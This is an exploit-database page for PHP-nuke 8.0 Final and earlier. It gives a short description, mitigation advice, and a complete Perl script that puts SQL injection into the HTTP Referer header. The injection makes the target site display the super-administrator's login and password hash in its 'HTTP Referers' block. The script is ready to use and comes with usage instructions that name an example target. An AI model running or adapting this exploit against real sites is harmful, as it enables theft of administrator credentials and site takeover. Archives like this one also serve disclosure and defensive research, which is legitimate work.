0day exploit for PHP-nuke - exploit.company

vendor:

PHP-nuke

by:

Maciej `krasza` Kukla

N/A

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP-nuke

Affected Version From: PHP-nuke <=8.0 Final

Affected Version To: PHP-nuke <=8.0 Final

Patch Exists: NO

Related CWE:

CPE: a:php-nuke:php-nuke:8.0

Metasploit:

Other Scripts:

Platforms Tested:

2007

0day exploit for PHP-nuke <=8.0 Final

This is a 0day exploit for PHP-nuke version <=8.0 Final. It is a SQL injection attack in the INSERT syntax when the 'HTTP Referers' block is on. The exploit allows an attacker to view the login and hash on the web page in the 'HTTP referers' block.

Mitigation:

Upgrade PHP-nuke to a version higher than 8.0 Final. Also, disable the 'HTTP Referers' block or implement proper input validation and sanitization to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#!/usr/bin/perl 
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version, when 'HTTP Referers' block is on
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#Screenshot:
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version, when 'HTTP Referers' block is on
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#
#[+]You can see login and hash on web page in 'HTTP referers' block
#[+]Exploit successed
use strict;
use warnings;
use LWP;
my $adres=shift or help();
my $ua = LWP::UserAgent->new;
my $zadanie = HTTP::Request->new(GET => $adres);
my ($respone,$referer);
banner();
	$referer="http://www.krasza.int.pl'),(NULL,(SELECT `pwd` FROM `nuke_authors` WHERE `radminsuper`=1))/*";
	$zadanie->referer($referer);
	$respone=$ua->request($zadanie);
	$respone->is_success or die "$adres : ",$respone->message,"\n";
        $referer="http://www.krasza.int.pl'),(NULL,(SELECT `aid` FROM `nuke_authors` WHERE `radminsuper`=1))/*";
	$zadanie->referer($referer);
	$respone=$ua->request($zadanie);
        $respone->is_success or die "$adres : ",$respone->message,"\n";
	print "[+]You can see login and hash on web page in 'HTTP referers' block\n";
	print "[+]Exploit successed\n";
sub banner{
	print "0day exploit for PHP-nuke <=8.0 Final\n";
        print "Sql injection attack in INSERT syntax\n";
	print "version, when 'HTTP Referers' block is on\n";
        print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n\n";
}
sub help{
	print "0day exploit for PHP-nuke <=8.0 Final\n";
	print "Sql injection attack in INSERT syntax\n";
	print "version, when 'HTTP Referers' block is on\n";
	print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n";
	print "Use:\n";
	print "\tperl exploit.pl [url]\n";
	print "\t[url]-vicitim webpage with index.php\n";
	print "Example:\n";
	print "\tperl exploit.pl http://phpnuke.org/index.php\n";
	exit(0);
}

# milw0rm.com [2007-02-20]